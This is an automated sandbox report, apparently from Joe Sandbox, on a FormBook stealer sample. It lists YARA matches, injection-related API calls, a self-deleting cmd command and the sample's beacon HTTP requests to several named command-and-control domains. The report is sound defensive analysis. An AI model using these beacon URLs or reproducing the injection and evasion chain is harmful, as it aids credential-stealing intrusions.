Source: global traffic	HTTP traffic detected: GET /mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.chinatowndeliver.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 23.227.38.74 23.227.38.74

Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: http://c.statcounter.com/9484561/0/b0cbab70/1/
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: http://statcounter.com/
Source: explorer.exe, 00000005.00000000.391155069.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/bg.png)
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/error_board.png)
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/header_bg.png)
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/logo_off.gif)
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/site_maintenance.png)

Source: unknown

DNS traffic detected: queries for: www.bellaalubo.com

Source: global traffic	HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw== HTTP/1.1Host: www.bellaalubo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.behiscalm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ== HTTP/1.1Host: www.productprinting.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg== HTTP/1.1Host: www.corlora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.jspagnier-graveur.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.chinatowndeliver.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: UaTmOE6yP9.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_008E275D
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01792060
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01796080
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_017947A0
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01796620
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01792A48
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01797080
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_017954E8
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_017919D0
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_017941A8
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01794E00
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_0179B1E8
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01793040
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_0179B808
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01793BC0
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_00911D21
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_008E6458
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00401030
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041C970
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041B9BF
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041D294
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041CBD1
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00408C80
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041CC9E
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00402D88
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00402D90
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00402FB0
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_008E275D
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00911D21
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_008E6458
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05220D20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05244120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522F900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F2D07
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F1D55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1002
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523841F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F20A8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523B090
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F2B28
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525EBB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F1FF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05246E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F22AE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F2EF7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDB9BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDC970
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDD294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDCBD1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDCC9E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DC8C80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DC2D90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DC2D88
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DC2FB0

Source: C:\Windows\SysWOW64\wscript.exe

Code function: String function: 0522B150 appears 35 times

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_004185E0 NtCreateFile,
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00418690 NtReadFile,
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00418710 NtClose,
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_004187C0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_004185DA NtCreateFile,
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041868A NtReadFile,
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041868C NtReadFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052699A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052695D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052696E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052696D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0526AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269560 NtWriteFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052695F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052699D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0526B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052698A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052698F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0526A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269760 NtOpenProcess,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0526A770 NtOpenThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052697A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0526A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269A20 NtResumeThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269A10 NtQuerySection,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD85E0 NtCreateFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD8690 NtReadFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD87C0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD8710 NtClose,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD85DA NtCreateFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD868C NtReadFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD868A NtReadFile,

Source: UaTmOE6yP9.exe, 00000003.00000002.412436722.000000000147F000.00000040.00000001.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs UaTmOE6yP9.exe

Source: UaTmOE6yP9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: UaTmOE6yP9.exe	Virustotal: Detection: 43%
Source: UaTmOE6yP9.exe	Metadefender: Detection: 37%
Source: UaTmOE6yP9.exe	ReversingLabs: Detection: 77%

Source: UaTmOE6yP9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe 'C:\Users\user\Desktop\UaTmOE6yP9.exe'
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe C:\Users\user\Desktop\UaTmOE6yP9.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe C:\Users\user\Desktop\UaTmOE6yP9.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe'

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/0@9/5

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: UaTmOE6yP9.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: UaTmOE6yP9.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: UaTmOE6yP9.exe, 00000003.00000002.412307284.0000000001360000.00000040.00000001.sdmp, wscript.exe, 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: UaTmOE6yP9.exe, 00000003.00000002.412307284.0000000001360000.00000040.00000001.sdmp, wscript.exe

Data Obfuscation:

Binary or sample is protected by dotNetProtector

Show sources

Source: UaTmOE6yP9.exe	String found in binary or memory: dotNetProtector
